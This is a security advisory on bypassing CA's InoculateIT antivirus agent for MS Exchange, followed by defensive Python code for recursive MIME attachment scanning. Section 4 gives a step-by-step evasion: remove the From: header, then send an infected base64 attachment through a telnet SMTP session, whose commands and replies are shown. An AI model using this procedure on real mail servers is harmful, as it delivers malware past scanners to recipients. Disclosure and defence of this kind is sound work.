Vulnerability: InoculateIT
Affected: InoculateIT

Description:
Hugo Caye found the following.

The scenario is two EX Srvrs, two different organizations and different sites; both have CA's "InoculateIT AV Option for MS Exchange Server". MS IMC (the EX SMTP gateway) will be used to send messages between the EX Srvrs.

Where the Agent fails:

1. If a message is sent from one EX to another (using IMC), and this message has an infected file (any file with any virus), "InoculateIT AV Option for MS Exchange Server" will not detect the attached file if the body of the message contains _only_ the attached file. If _any_ character is inserted in the body of the message (a dot, a tab, a space), "InoculateIT AV Option for MS Exchange Server" will detect the virus in the attached file.

2. Another weakness in "InoculateIT AV Option for MS Exchange Server" is that it does not recognize embedded messages. If the message has an embedded message, and this one has an infected attached file, "InoculateIT AV Option for MS Exchange Server" will not open the attached message to scan the infected attached file.

3. "InoculateIT AV Option for MS Exchange Server" just scans messages that are posted in the Inbox folder. If a server-based rule automatically moves messages to another folder (TurfMail, for example), "InoculateIT AV Option for MS Exchange Server" will not scan this message, allowing infected files to reach the mailbox.

4. Another bug that can easily be demonstrated is telnetting on tcp/25 against an EX Srvr with IMC (the MS SMTP connector/service). Just change some SMTP headers and CA's AVEX Agent does not even open the infected attached file. It is not a signature issue, since you can also send CA's virtest.com sample file. Any file can be sent, since the AVEX Agent doesn't recognize the message as having an attached file. Something like that can easily be done:

4.a. Get a message containing any infected attached MIME-encoded file. We simply filter it out via EX to C:\TurfDir, sending from outside to EX.

4.b. Edit the file (I used MS Notepad.exe) and just remove the "From: ..." line from the SMTP header. Something like this:

    ==>> Remove this line: From: Test <Test@abc.com.br>
    To: Hugo Caye <Hugo@xyz.com.br>
    Subject: Test
    Date: Mon, 23 Oct 2000 10:59:53 -0200
    MIME-Version: 1.0
    X-Mailer: Internet Mail Service (5.5.2650.21)
    Content-Type: application/x-msdownload; name="Fix2001.exe"
    Content-Transfer-Encoding: base64
    Content-Disposition: attachment; filename="Fix2001.exe"

    TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAsAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4g
    aW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABjDAXbJ21riCdta4gnbWuIJ21riGRta4ikcWWIJm
    1riFJpY2gnbWuIAAAAAAAAAABQRQAATAEDAJ/L0zcAAAAAAAAAAOAADwELAQUMABoAAAAA
    AgAAAAAAABAAAAAQAAAAMAAA... <<== Removed the rest here

4.c. Copy the Notepad content to the clipboard.

4.d. Issue the "telnet your_exsrvr 25" command:

    220 aaa.xyz.com.br ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2650.21) ready
    helo
    250 OK
    mail from:<>
    250 OK - mail from <>
    rcpt to:<hugo@xyz.com.br>
    250 OK - Recipient <hugo@xyz.com.br>
    data
    354 Send data. End with CRLF.CRLF

Here, paste from the clipboard (Win2K, just a mouse right-click). Something like this:

    To: Hugo Caye <Hugo@xyz.com.br>
    Subject: Test
    Date: Mon, 23 Oct 2000 10:59:53 -0200
    MIME-Version: 1.0
    X-Mailer: Internet Mail Service (5.5.2650.21)
    Content-Type: application/x-msdownload; name="Fix2001.exe"
    Content-Transfer-Encoding: base64
    Content-Disposition: attachment; filename="Fix2001.exe"

    TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAsAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4g
    aW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABjDAXbJ21riCdta4gnbWuIJ21riGRta4ikcWWIJm
    1riFJpY2gnbWuIAAAAAAAAAABQRQAATAEDAJ/L0zcAAAAAAAAAAOAADwELAQUMABoAAAAA
    AgAAAAAAABAAAAAQAAAAMAAA... <<== Removed...
    ....AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    .
    250 OK
    quit
    221 closing connection

4.e. Message sent; CA's Agent will not detect the infected file.

4.f. This is just one way of editing SMTP headers to avoid detection of the infected file. There are at least two more holes.

Solution:
Nothing yet.
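Holes 1, 2 and 4 above all come down to how the scanner decides what an attachment is: it apparently required a text body beside the attachment, did not descend into message/rfc822 parts, and depended on SMTP headers such as From:. The following is an added example, not code from the advisory, from Hugo Caye or from CA's product, showing the recursive MIME walk a gateway scanner needs so that none of those three conditions matters. The three sample messages, the file bytes and the "MZ" executable check are constructed stand-ins for real mail and a real AV engine.

```python
"""Recursive MIME attachment extraction for a gateway scanner (added example)."""
import base64
import email
from email import policy

# Constructed stand-in for an infected file: DOS/PE "MZ" magic plus a label.
SAMPLE_EXE = b"MZ\x90\x00" + b"constructed sample, not a real program"
SAMPLE_B64 = base64.b64encode(SAMPLE_EXE).decode()

# Holes 1 and 4: single-part message whose body is nothing but the attachment,
# with the From: line stripped as the advisory describes. Constructed sample.
MSG_BODY_ONLY = f"""To: Hugo Caye <Hugo@xyz.com.br>
Subject: Test
MIME-Version: 1.0
Content-Type: application/x-msdownload; name="Fix2001.exe"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Fix2001.exe"

{SAMPLE_B64}
""".encode()

# Hole 2: the attachment sits inside an embedded message/rfc822 part.
MSG_EMBEDDED = f"""From: Test <Test@abc.com.br>
To: Hugo Caye <Hugo@xyz.com.br>
Subject: Fwd: Test
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="outer"

--outer
Content-Type: text/plain

See the forwarded message.
--outer
Content-Type: message/rfc822

From: Test <Test@abc.com.br>
Subject: Test
MIME-Version: 1.0
Content-Type: application/x-msdownload; name="Fix2001.exe"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Fix2001.exe"

{SAMPLE_B64}
--outer--
""".encode()

# Control case: inline text only, nothing to scan.
MSG_CLEAN = b"""From: Test <Test@abc.com.br>
To: Hugo Caye <Hugo@xyz.com.br>
Subject: Hello
MIME-Version: 1.0
Content-Type: text/plain

Just a note, no attachment.
"""


def iter_leaf_parts(part, depth=0):
    """Yield (depth, part) for every leaf, descending through multipart
    containers and embedded message/rfc822 parts alike (hole 2)."""
    if part.is_multipart():          # True for multipart/* and message/rfc822
        for sub in part.get_payload():
            yield from iter_leaf_parts(sub, depth + 1)
    else:
        yield depth, part


def extract_attachments(raw):
    """Return [(filename, depth, payload_bytes)] for every part carrying file
    content. Anything that is not inline text counts, so a message that is
    nothing but the attachment (hole 1) is caught, and no envelope or From:
    header is ever consulted (hole 4)."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    found = []
    for depth, part in iter_leaf_parts(msg):
        inline_text = (part.get_content_maintype() == "text"
                       and part.get_content_disposition() != "attachment")
        if inline_text:
            continue                     # body text: nothing to scan
        payload = part.get_payload(decode=True) or b""   # undoes base64/QP
        found.append((part.get_filename() or "(unnamed)", depth, payload))
    return found


def scan(raw):
    """Constructed policy check standing in for the AV engine: flag every
    attachment, at any nesting depth, whose bytes start with 'MZ'."""
    return [name for name, _depth, payload in extract_attachments(raw)
            if payload.startswith(b"MZ")]


if __name__ == "__main__":
    for label, raw in (("body-only", MSG_BODY_ONLY),
                       ("embedded", MSG_EMBEDDED),
                       ("clean", MSG_CLEAN)):
        atts = extract_attachments(raw)
        print(f"{label:9s} attachments={len(atts)} flagged={scan(raw)}")
```

The decision in `extract_attachments` is deliberately about content, not context: a leaf is scanned unless it is inline text, so the presence or absence of a text body, a From: line or an enclosing multipart container changes nothing, and the embedded message in the second sample is found at nesting depth 2. Hole 3 (server-side rules moving mail out of the Inbox before the Inbox-only scan runs) is a deployment-placement problem that parsing cannot fix; scanning at the SMTP gateway, where this code would run, is the usual answer.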